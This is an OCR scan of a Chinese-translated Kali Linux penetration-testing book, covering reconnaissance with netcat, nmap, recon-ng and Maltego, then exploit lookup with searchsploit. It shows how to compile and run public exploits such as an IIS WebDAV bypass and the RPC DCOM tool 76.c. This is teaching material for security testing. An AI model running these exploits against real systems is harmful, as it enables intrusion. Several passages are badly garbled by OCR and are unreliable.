Security Considerations HOW-TO 


图 3.10 #2 Apache Tomcat 


审查 源 代 码 : 配置 不 当 的 Web 应 用 程序 可 能 应 答 菜 些 HTTP 请 求 ， 如 头 部 “HEAD)》 或 选项 (OPTIONS》 的 回应 包括 有 Web 服 务 嚣 软件 版 本 ， 或 
基本 操作 系统 ， 或 者 使 用 的 脚本 环境 。 在 图 3.11 中 ，netcat 是 从 命令 行 启动 的 ， 并 用 于 将 原始 HEAD 数 据 包 发 送 到 特定 网 站 。 该 请 求 将 生成 一 
个 错误 〈 找 不 到 404) 消息 ; 然而 ， 它 也 指出 ， 该 服务 器 正在 运行 微软 的 IIS， 版 本 为 7.5。 


root(ükali:-4 nc www. ca 80 
HEAD / HTTP/1.68 


HIIP/1.1 404 Not Found 

Connection: close 

Content-Length: 1245 

Date: Wed, 12 Mar 2014 16:05:02 GMT 
Content-Type: text/html 

Server: Microsoft-I1IS/7.5 

X-UrlMaster-404: Requested 404 

Set-Cookie: um IsMobile-False; pathz/; HttpOnly| 
X-Powered-By: ASP.NET 


图 3.11 PARKA 


3.5 RAS (AA 


虽然 Kali 包 合 多 个 工具 以 促进 侦察 ,许多 工具 包含 相同 的 功能 ， 但 是 将 数据 从 一 个 工具 导入 另 一 个 通常 是 一 个 复杂 的 手动 过 
程 。 大 多 数 测 试 者 选择 工具 的 一 个 子 集 ， 并 使 用 脚本 调用 它们 。 


最 初 的 综合 侦察 工具 是 命令 行 工具 ， 附 审 一 组 定义 的 功能 ; 其 中 ， 最 常用 的 是 DMitry 工 具 (Deepmagic Information 
Gathering Tool) 。DMitry 可 以 执行 whois 查 询 、 检 索 netcraft.com 信 息 ， 搜 索 子 域 、 电 子 邮 件 地 址 ， 并 进行 TCP 扫 描 。 不 至 
的 是 ， 除 了 这 些 功能 ， 它 是 不 可 扩展 的 。 


最 新 的 进展 创造 了 综合 框架 应 用 程序 ， 结 合 了 主动 侦察 和 被 动 侦察 。 我 们 将 回顾 nmap、recon-ng 和 maltego。 
3.5.1 nmap 


传统 意义 上 ，nmap 被 视 为 一 个 简单 的 映射 工具 ， 保 障 主机 和 端口 上 数据 的 可 用 性 ， 以 及 一 些 额外 的 数据 ， 例 如 目标 设备 的 
操作 系统 的 一 些 可 能 的 数据 。 


nmap 脚 本 引擎 (Nmap Scripting Engine, NSE) ， 已 经 将 nmap 转 变 为 一 种 工具 ， 它 可 以 进行 被 动 和 主动 侦察 ， 甚 至 执 
行 基本 的 漏洞 扫描 (脚本 的 完整 列表 ， 请 访问 http://nmap.org/nsedoc/) 。 


因为 写 脚 本 使 用 的 是 Lua 脚 本 语言 ， 渗 透 测 试 团队 很 容易 修改 和 释放 脚本 。 目 前 ， 脚 本 功能 包括 以 下 内 容 : 


:IPv4 和 IPv6 的 DNS 数据 的 侦察 。 

识别 现在 的 Web 应 用 程序 : 防火 墙 、IDS、IPS， 以 及 其 他 保护 控制 。 
测试 防火 墙 规则 〈 通 过 firewalk) ， 并 试图 绕 过 防火 墙 。 

:从 目标 和 在 线 网 站 收集 用 户 名 。 

.对 各 种 服务 和 应 用 的 弯 力 密码 猜 解 。 

: 抓 取 目标 网 络 来 识别 网 络 股 。 


:从 定义 的 网 站 图 像 中 提取 EXIE 元 数据 。 
:IP 地 址 的 地 理 定 位 。 

进行 网 络 攻击 ， 如 IPv6 报 文 泛 洪 。 
漏洞 扫描 ， 包 括 模糊 测试 和 SoL 注 入 检测 。 


正如 你 所 看 到 的 ， 增 强 nmap 肢 本 的 能 力 ， 使 用 可 扩展 的 语言 ， 如 Lua 的 脚本 语言 ， 对 这 个 工具 是 非常 重要 的 。 


一 个 有 用 的 脚本 是 Marc Ruef 的 vulscan (http://www.computec.ch/mruef/software/nmap nse vulscan- 


1.0.tar.gz) ， 它 结合 了 nmap 的 指纹 特征 (使 用 -sV 标 志 ) 与 主要 查找 的 漏洞 ， 如 MITRE、OSVDB 和 SecurityFocus。 
下 载 脚 本 包 ， 解 压 文件 ， 并 且 移 动 文件 到 usr/share/nmap/scripts。 


为 了 从 命令 行 调用 一 个 脚本 命令 ， 使 用 --script 标 志 ， 然 后 确定 脚本 的 名 称 。 使 用 下 面 的 命令 启动 经 常 使 用 的 一 种 脚 
本 ，nmap 的 一 般 漏洞 扫描 器 : 


root@kali:~# nmap -sV --script-vulscan.nse digitaldefence.ca 


在 这 种 特殊 情况 下 ， 使 用 已 知 的 侦 测 ， 漏 洞 扫 摘 没有 上 现任 何 漏洞 ， 如 图 3.12 所 示 。 
root(ükali:-4 nmap -sV --script-vulscan digitaldefence.ca 


Starting Nmap 6.40 ( nttp://nmap.org ) at 2013-08-12 21:27 EDT 

Nmap scan report for digitaldefence.ca (54.236.190.114) 

Host is up (0.0069s Latency). 

rONS record for 54.236.190.114: ec2-54-236-1980-114.compute-1.amazonaws.com 
Not shown: 997 filtered ports 

PORT SIAIE SERVICE VERSION 

22/tcp open sftp ProFTPD mod sftp 0.9.8 

| vulscan: scipvulab - http://www.scip.ch/en/*?vuldb (@ findings): 

No findings 


cve - http://cve.mitre.org (0 findings): 
No findings 


osvdb - http://www.osvdb.org (8 findings): 
No findings 


securityfocus - http://www.securityfocus.com/bid/ (0 findings): 
No findings 


图 3.12 4% H nmap-sv 43 48 


sbiacrrabs 阅 本 是 一 个 必 备 脚本 ， 它 用 于 截图 web 服务 。 它 要 求 下 载 wkhtmltoimage 工 具 
Chttp://wkhtmltopdf.googlecode.com) ， 并 且 放 在 /usr/1local/bin 目 录 中 。 应 该 下 载 截 | 
(https://github.com/spiderlabs/nmap-tools/blob/master/nse/http-screenshot.n 并 且 放 

5 / d nd share/nmap/scripts 目 录 中 。 当 调用 时 ， 该 脚本 会 产生 所 有 已 识别 的 网 络 服务 的 1 可 视 化 记录 使 其 更 容易 被 选择 出 来 ， 作 
9 测试 目标 。 


3.5.2 ”recon-ng 框 架 


recon-ng 框 架 是 进行 (主动 和 被 动 ) 侦察 的 开源 框架 。 


像 Metasploit 框 架 (Metasploit Framework) 和 社会 工程 师 工 具 包 (Social Engineer Toolkit) 一 样 ，recon-ng 采 用 了 模 


块 化 的 框架 。 每 个 模块 是 一 个 定制 的 cmd 解 释 ， 为 执行 特定 任务 作 预 配置 。 


recon-ng 框 架 及 其 模块 用 Python 编写 的 ， 为 方便 测试 ， 人 允许 渗透 测试 人 员 轻 松 地 建立 或 改变 模块 。 
recon-ng 框 架 工 具 利 用 第 三 方 APl 进 行 一 些 评估 ; 这 种 额外 的 灵活 性 意味 着 通过 recon-ng 的 主动 性 ， 可 以 跟踪 那些 当 事 
人 。 用 户 可 以 自 定 义 一 个 UserAgent 字 符 串 或 代理 请 求 ， 以 尽量 减少 警报 目标 网 络 。 


通过 recon-ng 收 集 的 所 有 数据 被 放置 在 一 个 数据 库 中 ， 使 你 能 够 创建 针对 存储 数据 的 各 种 报告 。 用 尸 可 以 选择 报告 模块 中 


的 任意 一 个 来 自动 创建 ， 可 以 是 CVS 报 告 ， 也 可 以 是 HTML 报 告 
使 用 recon， 应 执行 以 下 步骤 : 


1. 如 果 你 的 Kali 版 本 没有 安 六 recon-ng， 请 使 用 以 下 命令 : 
apt-get install recon-ng 


2. 要 局 动 应 用 程序 ， 在 提示 符 后 输入 recon-ng， 如 图 3.13 所 示 。 初 始 屏 幕 将 显示 本 模块 的 数量 ， 并 且 帮 助 命令 将 显示 可 应 
用 的 命令 。 


root@kalli:~# recon-ng 


NM. EON E: Bus KR ie oes ae F E. "t NAI 
E EET. f Ni "e A 上 Em. / / 
PP ok of Pouf Ë f / / f / Eod / / f f P wu 
E f f / f E ME E _f LA NAM. ES 
E ff E A EF £u EJ of _f E, gh E: y, / 
[59] Recon modules 
[5] Discovery modules 
[3] Reporting mad ims 
[1] Experimental modules 
racon-ng > help 
commands (type [hnelp|?] «topicz): 


back Exits current prompt level 

banner Displays the banner 

exit Exits current prompt Level 

nelp Displays this menu 

info Displays module information 

«evys Manages framework API keys 

load Loads selected modula 

query Queries the database 

record Records commands to a resource file 
reload Reloads all modules 

resource Executes commands from a resource file 
run Not available 

search Searches available modules 

set sets global options 

shell Executed shell commands 

show Shows various framework items 

d4se Loads selected module 


3. 要 显示 可 用 的 模块 ， 人 在 类 型 提示 符 recon-ng> 后 输入 show。 要 加 载 特定 的 模块 ， 输 入 load， 其 后 紧 跟 模块 的 名 称 。 在 输 


图 3.13 4% H] recon-ng 


入 中 ， 按 下 tab 键 会 目 动 完成 命令 的 输入 。 如 果 模 块 具有 独特 的 名 称 ， 你 可 以 输入 名 称 的 独特 之 处 ,模块 载 入 将 不 加 载 完 整 路 


pA 
12. 


输入 info， 见 图 3.14， 将 为 你 提供 有 天 模块 的 工作 原理 ， 并 人 在 必要 时 获得 API 密 钥 。 


recon-ng > Load recon/contacts/gather/http/web/jigsaw 
recon-ng [jigsaw] > info 


Name : 
Jigsaw Contact Enumerator 


Path: 
modules/recon/contacts/gather/http/web/jigsaw.py 


Author: 
Tim Tomes (@LaNMaSteR53) 


Description: 
Harvests contacts from Jigsaw.com and updates the ‘contacts’ table of the dai 
tabase with the results. | 


Options: 
Name Current Value Req Description 
COMPANY yes target company name 
KEYWORDS no additional keywords to identify company 


recon-ng [jigsaw] > fj | 
图 3.14 使 用 info 查 看 模块 


4 一 旦 模块 被 加 载 ， 使 用 set 命 令 设置 选项 ， 然 后 输入 run 来 执行 ， 如 图 3.15 所 示 。 


recon-ng [jigsaw] > set company digitaldefence 

COMPANY => digitaldefence 

recon-ng [jigsaw] » run 

[*] Gathering Company IDs... 

[*] Query: http://www.jigsaw.com/FreeTextSearchCompany.xhtml ?opCode-search&f reeT 
ext-digitaldefence- 

[*] Unique Company Match Found: 362937 

[*] Gathering Contact IDs for Company '362937'... 

[*] Query: http: //www.jigsaw.com/SearchContact.xhtml?rpage-l&opCode-showCompDi r&| 
companyId-362937 

[*] Query: http://www.jigsaw.com/SearchContact .xhtml ? rpagez2&opCode-sshowCompDi ra) 
companyId-362937 

[*] Gathering Contacts... 

[*] [7805728] Robert Beggs - Chief Executive Officer (Burlington, ON - Canada) 


图 3.15 ”使 用 set 命 令 设置 选项 


总 的 来 说 ， 依 靠 recon-ng 的 测试 需要 做 到 以 下 几 点 : 


使 用 whois、jigsaw、1linkedin 和 twitter 来 获得 连接 (用 损坏 的 模块 提取 、 呈 现 电子 邮件 数据 〉。 
识别 主机 。 

-使 用 hostop、ipinfodb、maxmind、uniapple 和 wigle 识 别 主机 和 个 人 的 地 理 位 置 。 

使 用 netcraft 及 相关 模块 识别 主机 信息 。 


.确定 以 前 被 攻击 入 侵 过 ， 在 互联 网 上 泄漏 过 的 账户 及 其 密码 信息 Cownedlist#i. wascompanyhacked. xssedfllpunkspider) . 


3.5.3 Maltego 


AN 一 一 


Maltego (www.paterva.com) 是 一 个 开源 的 智能 、 取 证 应 用 软件 。 社 区 版 包括 了 设置 搜索 的 大 小 限制 的 Kali; APA, ix 
是 一 个 很 好 的 工具 ， 数 据 挖掘 和 链接 分 析 都 实现 了 民 好 的 可 视 化 。 


Maltego 人 允许 你 列举 个 人 信息 、 链 接 一 个 特定 的 人 与 公司 、 电 子 邮 件 地 址 、 网 站 、 社 交 网 络 团体 和 电话 号 码 等 。 这 也 促进 了 
whois 人 信息、 域名 、DNS 信 息 、IP 地 址 和 netblocks 的 被 动 和 主动 侦察 。 


1. 打 开 应 用 程序 ， 输 入 maltego 作 为 一 个 命令 提示 符 。 你 第 一 次 打开 它 ， 束 会 要 求 你 注册 ， 并 通过 Paterva 验 证 你 的 电子 邮 
件 地 址 。 


一 旦 完成 注册 和 变换 更 新 ， 你 将 会 看 到 一 个 多 窗 格 的 图 形 用 户 界 面 ， 在 该 界面 中 你 可 以 检查 各 种 数据 对 象 之 间 的 连接 ， 如 
图 3.16 所 示 。 
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图 3.16 ”Maltego 用 户 界 面 


Maltego 是 依赖 于 一 系列 变换 或 模块 ， 存 储 在 应 用 程序 的 左 侧面 板 。 变 换 的 选择 通过 左边 的 列 挑选 它们 ， 然 后 拖 动 到 应 用 程 
序 的 中 心 。 


默认 情况 下 ， 图 标 pantera.com 被 当 作 初 始 选 择 ， 但 是 你 可 以 使 用 右 栏 的 数据 操作 区 重 命名 和 更 改 数据 。 


在 社区 版 中 存在 几 种 不 同 的 转换 ， 这 些 被 分 为 若干 组 ， 如 设备 (Devices) 、 基 础 设施 (Infrastructure) 、 个 人 
(Personal) 、 地 点 (Locations) 、 渗 透 测试 (Penetration Testing) 和 社交 网 络 (Social Networks) ， 如 图 3.17 所 示 。 
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A317 不同 的 转换 的 截图 
3. 拖 动 适 当 变 换 到 工作 表 ， 单 击 右键 ， 将 完成 变换 身份 。 请 记 住 ， 如 果 你 选择 了 所 有 选项 ， 会 需要 大 量 的 处 理 时 间 。 


分 析 关 系 的 能 力 对 于 执行 社会 工程 攻击 尤其 有 用 。 例 如 ， 如 果 目 标 网 站 包含 多 个 到 其 他 网 站 的 链接 ， 攻 击 者 可 以 利用 这 种 天 
系 ， 进 行 网 络 钓鱼 攻击 。 


3.6 jill 


漏洞 扫 摘 采用 目 动 化 过 程 和 目 动 化 应 用 程序 ， 以 确定 在 网 络 、 系 统 、 操 作 系统 或 应 用 程序 中 可 能 利用 的 漏洞 。 


当 执行 正确 时 ， 一 个 漏洞 扫 摘 委 置 提供 一 个 设备 清单 (授权 和 恶意 设备 ) ， 已 经 主动 扫 拉 已 台 的 漏洞 ， 通 单 还 会 提供 一 个 确 
认 的 符合 该 设备 的 各 种 政策 和 法 规 的 襄 明 。 


不 斑 的 是 ,漏洞 扫描 提供 一 些 容易 被 大 多 数 网 络 控制 检测 到 的 噪声 一 一 多 分 数据 包 ， 隐 形 几 乎 不 可 能 实现 。 它 们 还 遭受 以 
下 附加 的 限制 : 


在 大 多 数 情况 下 ， 漏 洞 扫描 需 是 基于 人 签名 的 ， 它 们 只 能 检 训 已 知 的 漏洞 ， 且 仅 当 有 一 个 已 经 存在 的 识别 标志 一 该 扫描 仪 可 以 应 用 于 目标 。 对 
一 个 渗透 测试 者 ， 最 有 效 的 扫描 软件 是 开源 的 ， 人 允许 测 试 人 员 快 速 修改 代码 来 检测 新 的 漏洞 。 


I 通常 包含 错误 结果 ， 可 能 导致 测试 人 员 误 入 上 收 途 ; 特别 是 ， 不 同 的 网 络 操作 系统 ， 产 生 的 不 正确 信息 的 比率 高 达 
10% o 


Titus n] Beo P9128 fr snp, AT LA BUE v] 2% EIS Bx Se SCR ES EN CSSA ZR He (Network Scanning Watch List) , 
网 址 为 www .digininja.org， 其 中 列 出 了 漏洞 测试 引起 的 已 知 失效 的 设备 ) 。 


在 东 些 控制 区 ， 扫 描 被 认为 是 黑客 攻击 ， 并 可 能 构成 违法 行为 。 


有 多 个 商用 的 和 开源 的 漏洞 扫 摘 软件 。 在 Kali 中 ， 扫 摘 工 具 可 以 在 漏洞 分 析 (Vulnerability Analysis) FRAPE, trè 
是 网 络 漏洞 扫 摘 器 (Web Vulnerability Scanners) 菜单 ; 然而 ， 主 要 的 漏洞 扫 摘 嚣 是 开放 陈 漏 洞 评估 系统 (Open 
Vulnerability Assessment System, OpenVAS) 。 


Kaliszee ee Biss. WREST PHS, BEBRSOR ANSEL IMO. 8B 
么 推荐 使 用 Nexpose 扫 描 器 (www.rapid7.com) ， 以 及 久负盛名 的 Nessus (www.nessus.org) 。 


3.7 小 结 
在 主动 侦察 中 ， 攻 击 者 的 活动 被 真正 友 现 的 机 会 极 大 ， 使 他 们 处 于 危险 之 中 。 攻 击 者 在 映射 的 网 络 中 ， 找 到 开放 端口 ， 并 确 
定 已 安 六 的 操作 系统 和 应 用 程序 。 


为 了 降低 风险 ， 攻 击 者 采用 隐形 扫 拉 技术 。 手 动 方法 被 用 来 创建 慢 扫 摘 ; 然而 ， 这 种 方法 并 不 总 是 有 效 的。 因此 ， 攻 击 者 利 
用 工具 ， 如 Tor 网 络 以 及 各 种 代理 应 用 程序 来 隐藏 目 己 的 身份 。 


在 下 一 章 中 ， 我 们 将 重点 分 析 从 侦察 阶段 及 其 他 来 源 得 到 的 数据 ， 并 介绍 攻击 者 如 何 用 它们 来 计划 和 执行 对 目标 网 络 或 系统 
的 远程 攻击 。 我 们 会 检测 各 种 攻击 拷 术 和 工具 ， 并 重点 讨论 如 何 确保 该 侦察 无 法 通过 正 弟 手段 检测 。 我 们 也 将 研究 远程 侦 测 ， 并 
将 其 作为 一 个 持续 的 过 程 ， 介 绍 攻 击 者 ， 如 何 利用 这 一 技术 成 功 找到 新 的 目标 。 


第 4 章 ”漏洞 利用 


主动 侦察 和 被 动 侦察 的 目的 是 找 出 测试 者 或 攻击 者 最 有 可 能 利用 的 安全 漏洞 以 支持 他 们 的 目标 (拒绝 服务 攻击 、 穷 取 或 数据 
修改 ) 。 杀 链 的 利用 阶段 的 重点 是 创建 访问 以 到 达 目 标 ;或 者 通过 创建 拒绝 服务 以 停止 目标 的 接 入 服务 ;又 或 者 ,创建 攻击 者 与 
目标 建立 持久 的 接 入 关系， 这 种 方法 更 部 见 。 


渗透 测试 者 在 利用 阶段 必须 天 注 以 下 几 方 面 : 


目标 的 整体 特征 是 什么 ?如果 攻击 者 不 能 对 目标 对 象 的 网 络 和 主机 架构 进行 全 方位 的 了 解 ， 攻 击 将 失败 ， 并 且 给 侦察 带 来 风险 。 


利用 在 目标 系统 上 定义 的 众所周知 的 行动 ? 当 使 用 一 个 没有 特征 的 渗透 时 ， 可 能 会 产生 意 想 不 到 的 后 采 ， 并 且 造 成 的 损害 可 能 对 测试 进程 产 
生 负 面 影响 。 训 试 者 在 渗透 前 ， 应 该 在 茶 个 特定 的 设置 下 提前 验证 所 有 的 渗透 方法 。 


:漏洞 产生 是 来 源 于 远程 位 置 ， 还 是 来 源 于 本 地 目标 系统 ?对 于 攻击 者 ， 远 程 渗透 相对 来 说 是 安全 的 ， 因 为 被 验 明正 号 的 机 会 较 小 ; 然而 ， 在 
本 地 渗透 中 ， 攻 击 者 可 以 更 好 地 控制 渗透 操作 ， 并 降低 被 侦察 到 的 可 能 性 。 


需要 什么 样 的 后 期 渗透 活动 ? 如 果 攻 击 者 需要 从 目标 急 取 数据 ， 则 渗透 必须 文 持 建 立交 互 式 连接 。 
是 持续 访问 被 入 侵 的 系统 ， 还 是 短期 侵入 被 入 侵 的 系统 ?这 将 确定 是 否 使 用 隐 里 方法 。 


数 以 干 计 可 利用 的 漏洞 已 被 确定 ， 而 且 大 多 数 与 至 少 一 个 概念 验证 代码 或 扩 术 相关 联 ， 人 允许 系统 受到 攻击 。 尽 管 如 此 ， 网 
络 、 操 作 系 统 和 应 用 程序 成 功 的 基本 原理 是 相同 的 。 


威胁 建 模 。 

使 用 在 线 和 本 地 漏洞 资源 。 

通过 Metasploit 框 染 渗 透 一 个 远程 目标 。 
-使 用 Armitage 的 多 目标 渗透 。 


SERE IDA Spy BERMI o 


4.1 威胁 建 模 


馈 动 和 主动 侦察 阶段 ， 将 在 目标 网 络 和 系统 之 间 形 成 映射 ， 同 时 识别 攻击 者 可 利用 的 安全 漏洞 。 在 这 个 阶段 ， 攻 击 者 的 杀 链 
对 动作 有 一 个 强烈 的 偏见 一 一 测试 者 希望 通过 和 直接 局 动 攻 击 来 证 明 他 们 可 以 击 垮 目标 。 然 而 ， 蕊 外 攻击 可 能 并 不 是 实现 目的 最 
为 有 效 的 手段 ， 它 可 能 以 牺牲 所 需要 的 隐身 性 为 代价 来 实现 攻击 目的 。 


渗透 测试 者 已 经 采取 的 (正式 或 非 正式 的 ) 一 个 过 程 ， 被 称 为 威胁 建 模 。 这 最 初 是 由 网 络 规划 者 友 展 起 来 的 ， 制 定 针 对 攻击 
的 防御 对 策 的 过 程 。 


渗透 测试 者 和 攻击 者 通过 不 断 寻 找 防 御 威 胁 建 模 方法 来 提高 攻击 的 成 功率 。 攻 击 威胁 建 模 是 制定 攻击 策略 的 一 个 较为 常见 的 
手段 ， 它 将 侦察 和 研究 的 结果 相 结 合 。 攻 击 者 必须 充分 考虑 现 有 的 目标 ， 并 确定 目标 是 以 下 何 种 类 型 : 


首要 目标 : 当 这 些 目标 被 击 垮 时 ， 这 些 目标 将 直接 帮助 攻击 者 达到 目的 。 


目标 可 以 提供 信息 《安全 控制 、 密 码 、 登 录 政 策 、 本 地 ， 以 及 域 管理 员 名 字 和 密码 ) 以 文 持 对 首要 目标 进行 攻击 或 访问 。 


第 三 目标 : WALA pa Be SMAAK, (EEA ea ea, BWA Ses Bote tia Sakae UB ABS o 


对 每 种 类 型 的 目标 ， 测 试 者 需要 确定 相应 的 测试 方案 。 单 个 漏洞 可 以 通过 隐身 技术 进行 攻击 ， 而 多 目标 可 以 通过 大 量 攻 击 来 
对 目标 进行 快速 渗透 。 如 果实 施 一 个 大 规模 的 攻击 ， 防 护 者 的 控制 装置 产生 的 噪声 ， 经 常会 导致 他 们 减少 在 路 由 器 和 防火 墙 的 登 
录 次 数 ， 甚 至 完全 蔡 用 它们 。 


该 万 法 对 渗透 选择 具有 指导 性 作用 。 一 般 情 况 下 ， 攻 击 者 创建 威胁 模型 时 ， 将 遵循 图 4.1 所 示 的 攻击 树 方 法 。 
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图 4.1 威胁 模型 的 攻击 树 图 


攻击 树 方法 为 测试 者 查看 可 用 的 攻击 选项 提供 了 便利 ， 如 果 一 个 攻击 方案 没有 成 功 ， 也 可 以 快速 找到 替代 方案 。 一 旦 生成 攻 
击 树 ， 接 下 来 渗透 阶段 需要 确定 该 渗透 是 人 否 可 以 对 目标 对 象 的 漏洞 进行 攻击 。 


4.2 ”使 用 在 线 和 本 地 局 洞 这 源 


忌 之 ， 被 动 侦察 和 主动 侦察 确定 了 目标 的 攻击 面 ， 也 就 是 涡 ， 可 以 对 漏洞 进行 评估 的 点 的 忌 数 。 服 务 器 是 否 能 够 被 渗透 与 所 
安装 的 操作 系统 是 否 存在 漏洞 相关 ; 然而， 潜在 的 漏洞 数量 将 随 着 安 闪 的 应 用 程序 的 数量 的 增长 而 增长 。 


渗透 测试 者 和 攻击 者 必须 找到 即将 攻击 的 具体 漏洞 ， 包 括 已 知 的 漏洞 以 及 怀疑 的 漏洞 。 漏 洞 搜 索 可 以 从 供应 商 的 网 站 开始 ， 
在 友 布 补丁 和 升级 的 同时 ， 大 多 数 的 硬件 和 应 用 程序 供应 商会 提供 和 安全 漏洞 相 天 的 信息 。 如 果 一 个 特定 弱点 的 利用 是 已 知 的 ， 
大 多 数 供应 商都 会 向 客户 强调 那些 特定 的 、 已 知 的 漏洞 。 虽 然 他 们 的 目的 是 让 客户 来 测试 漏洞 是 否 存 在 ， 但 同时 ， 攻 击 者 和 渗透 
测试 者 也 可 以 利用 这 类 信息 。 


收集 、 分 析 和 共享 有 关 漏 洞 的 网 站 信息 如 下 : 


.国家 漏洞 数据 库 (The National Vulnerability Database) 整合 了 所 有 由 美国 政府 发 布 的 公开 漏洞 数 
W: http://web.nvd.nist.gov/view/vuln/search. 


安全 监控 网 站 Secunia: http://secunia.com/community/. 


开源 漏洞 数据 库 项 目 (Open Source Vulnerability Database Project, OSVDP) 网 址 : 


http://www.osvdb.org/search/advsearch, 


数据 包 风 暴 CPacketstorm) 安全 网 址 : http://packetstormsecurity.com/. 


Inj3ctOrhjhb: nttp://1337day.com/. 


‘-HOffensive Security 维 护 的 可 以 利用 的 漏洞 数据 库 网 址 : http: //www.db-exploit.com. 
漏洞 数据 库 也 被 复制 到 本 地 Kali， 并 且 可 以 在 /usr/share/exploitdb 目 录 中 找到 。 在 使 用 之 前 ， 确 保 使 用 以 下 命令 进行 更 
新 : 
cd /usr/share/exploitdb 
wget http://www.exploit-db.com/archive.tar.bz2 
tar -xvjf archive.tar.bz2 


rm archive.tar.bz2 


搜索 漏洞 数据 库 (exploitdb) 的 本 地 副本 ， 需 要 打开 终端 窗 口 ， 在 命令 提示 符 下 输入 searchsploit 和 需要 搜索 的 关键 词 。 
这 将 调用 一 个 脚本 ， 肢 本 搜索 合 所 有 漏洞 列表 的 数据 库 文件 (.csv) 。 搜 索 将 返回 对 已 知 漏洞 的 描述 ， 以 及 和 该 漏洞 相关 的 路 
径 。 特 定 漏洞 可 以 被 提取 、 编 译 和 运行 。 图 4.2 是 漏洞 数据 库 的 查询 图 。 


otmkall: # searchsploit bulletproof FIP 
Description Path 


BulletProof FIP Server 2.4.80.31 Local Privilege Escalation Exploit /windows/locaLl/$/1.cpp 
BulletProof FIP Client 2.45 Remote Buffer Overflow Exploit (PoC) /windows/remote/2530.py 
BulletProof FTP Client 2.53 Local Heap Overflow Pot /windows/dos/7571.txt 
BulletProof FIP Client (.bps File) Local Stack Overflow Pot /windows/dos//5898.pl 
BulletProof FIP Client 2009 (.bps) Buffer Overflow Exploit (SEH) /windows/local/8420.py 
BulletProof FIP 2.53 b56 Client Malformed '.bps' File Stack Buffer Overflow /windows/remote/9988.c 
BulletProof FIP Client 2010 - Buffer Overflow Vulnerability /windows/dos/18/16.txt 


A4.2 ”查询 漏洞 数据 库 (exploitdb) 


忆 扫 索 脚本 从 左 至 右 扫 描 数 据 库 csv 文 件 中 的 每 一 行 ， 因此 搜索 项 的 顺序 很 重要 ， 对 于 oracle 10g 数 据 进 行 搜索 将 返回 多 个 漏洞 ， 但 109g 
oracle A FAIRE. FFA, AE KDA SIN; 虽然 对 搜索 词 要 求 使 用 小 写字 从 ， 搜 索 Bulletproof FTP 不 会 返回 任何 
结果 ， 但 搜索 bulletproof FTP 会 返回 7 个 结果 。 可 以 通过 使 用 grep 命 令 ， 或 搜索 工具 如 KWrite (apt-get install kwrite) ， 对 数据 
库 文件 CSV 进 行 更 有 效 的 搜索 。 


通过 扫描 和 路 径 列表 对 本 地 数据 库 进行 搜索 ， 可 以 识别 几 种 可 能 的 漏洞 ;， 然 而， 这 需要 根据 你 的 相应 环境 进行 定制 ， 并 在 使 
用 前 进行 编译 。 复 制 漏洞 到 /tmp 目 录 下 (给 定 路 径 不 考虑 保留 在 /platforms 目 录 中 的 /windows/remote 目 录 ) 。 


漏洞 利用 以 脚本 的 形式 呈现 ， 例 如 ，Perl|、Ruby 和 PHP 等 ， 都 是 相对 易于 实现 的 脚本 语言 。 例 如 ， 如 果 攻 击 目标 是 
Microsoft Il 6.0 服 务 器 ， 攻 击 者 会 相对 容易 绕 过 远程 认证 ， 复 制 该 漏洞 利用 到 根 目 录 ， 然 后 像 标 准 的 Perl 脚 本 那样 执行 ， 如 图 
4.3BfTzn. 


root@kali:~# perl 8806.pl 
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit 
$ written by kaO0x <ka@x@1l[at] gmail.com> 


$ 25/05/2009 


usage: 
perl $0 «host» «path» 


example: 
perl $0 Localhost dir/ 
perl $0 localhost dir/file.txt 


图 4.3 ”运行 标准 的 Peqd 脚 本 


许多 漏洞 在 使 用 前 必须 像 源 代码 那样 进行 编译 。 例 如 ， 搜 索 RPC-specific 漏 洞 ， 识 别 多 种 可 能 的 漏洞 利用 。 摘 录 如 图 4.4 所 


7e 
rootükali:/usr/share/exploitdb£ searchsploit rpc 
Description Path 
MS Windows RPC Locator Service Remote Exploit /windows/remote/5.c 
MS Windows 2000 RPC DCOM Intertace DoS Exploit /windows/dos/51.c 
MS Windows (RPC DCOM) Remote Buffer Overflow Exploit /windows, ramate/64 .c 
MS Windows (RPC DCOM) Remote Exploit (wzk-XP Targets) /windows/ remote/66.c 
MS Windows RPC DCUM Remote Exploit {18 Targets) /windows/remate/59.c 
MS Windows (RPC DCOM) Remote Exploit (4&8 Targets) /windows/ remotes /@ .c 
MS Windows (RPC DCOM) Remote Exploit (Universal Targets) /windows/remote//6.c 


图 4.4 PRC 漏 洞 利用 编译 截图 


RPC DCOM 漏 洞 识别 工具 ， 如 76.c， 实 践 中 证 明 它 是 相对 稳定 的 。 因 此 ， 我 将 用 它 作 为 例子 。 为 了 编译 该 漏洞 利用 工具 ， 
掉 先 将 它 从 存储 目录 复制 到 /tmp 下 。 在 该 位 置 ， 使 用 GCC 的 命令 进行 编译 ， 命 令 如 下 : 


root@kali:~# gcc 76.c -o 76.exe 


这 里 将 使 用 GNU 编 译 器 集 (GNU Compiler Collection) 对 76.c 进 行 编译 ， 然 后 输出 (-0) 文件 76.exe， 如 图 4.5 所 示 。 


root@kali:, isr /share/expLoitdb/oLatforms/windo fremote# cp /6.¢ /tmp 
root@kali: /usr/share/expLoitdb/pLatforms/windows/remote# cd /tmp 
root@kali:/tmp# 1s 

root@kali:/tmp# gcc 76.c -o 76.exe 


图 4.5 ”用 GNU 编 译 76.c， 生 成 76.exe 
当 针 对 目标 调用 应 用 程序 时 ， 你 必须 使 用 如 下 所 示 的 符号 链接 来 调用 可 执行 文件 (该 文件 并 未 存储 在 /tmp 目 录 ) : 


root@kali:~# ./76.exe 


这 个 漏洞 利用 的 源 代 码 有 清晰 的 文档 记录 ， 并 且 ， 需 要 执行 的 参数 一 目 了 然 ， 如 图 4.6 所 示 。 


root@kali:/tmp# ./76.exe 
RPC DCOM exploit coded by .:[oci932.us]:. Security 
Usage: 


.//6.exe -d «host» [options] 


Options: 
-d: Hostname to attack [Required] 
ers Type [Default: 0] 
a Return address [Default: Selected from target] 
zB. Attack port [Default: 135] 
-l: Bindshell port [Default: 666] 
Types: 


9 [0x80018759f]: [Win2k-Universal] 
] [9x0100139d] : [WinXP -Universal ] 


图 4.6 ”76.exe 文 件 的 运行 参数 
遗憾 的 是 ， 不 是 所 有 来 自 漏洞 数据 库 和 其 他 公共 资源 的 漏洞 都 像 76.c 一 样 容易 编译 。 这 里 为 渗透 测试 者 列 出 了 几 种 可 能 存在 
危险 的 漏洞 利用 情况 : 


Nesey replat cole aes A Aaa ES) JT ACA OR ee LE EAA ARH, Joe AA RSE NE BI OT 


